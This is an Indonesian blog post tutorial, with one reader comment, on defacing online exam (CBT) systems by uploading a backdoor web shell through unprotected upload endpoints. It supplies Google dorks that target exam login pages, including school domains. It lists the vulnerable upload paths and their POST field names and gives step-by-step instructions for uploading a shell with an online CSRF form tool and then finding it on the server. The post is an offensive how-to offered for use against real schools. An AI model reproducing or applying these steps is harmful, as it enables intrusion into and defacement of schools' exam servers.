Deface Proof CBT ( Computer Basic Technologi )
Minggu, 13 Oktober 2019
1 Komentar
CBT Vulnerability Upload Shell With Csrf
Bahan-bahan yang di perlukan yaitu :
-hp / pc
-Internet lancar
-Shell backdoor atau mini shell
-script deface
-dork
-Csrf Online
Dork nya sudah saya sediakan dibawah ini :
-inurl:/login.php
-inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart
-inurl:/panel/pages/login.php site:.sch.id
Dan ini Exploitnya :
/panel/pages/upload-file.php
Postfile: uploadfile
/panel/pales/upload_jawab7.php
Postfile: uploadfile7
/panel/pales/upload_jawab6.php
/panel/pales/upload_jawab5.php
Postfile: uploadfile5
/panel/pales/upload_jawab2.php
/panel/pales/upload_jawab1.php
Postfile: uploadfile1
1. Kamu dorking dulu pake dork di atas atau pakai dork hasil racikan mu sendiri
Pilih Target Nya Lalu Masukan Exploit
Jika Vuln Target akan Blank Putih / Kosong
2. Lalu Copy Link Target Dan Letakkan Pada Csrf Online Nya
Untuk Csrf Onlinenya Bisa Gunakan Punya Kami
CSRF ONLINE
Untuk Postfile Nya Tergantung Exploit Ya
3. Kalo Sudah Upload Shell Kalian Akan Ada Tulisan Success Pada Halaman
Setelah Itu Cek Shell Kalian Pada dir
/[path]/images/namashell.php
Atau di
/[path]/pictures/namashell.php
Sekian Tutorial Dari Saya.
Sampai Ketemu di tutorial berikutnya.
Csrf kagak ada uploadfile bro saran apa nih
BalasHapus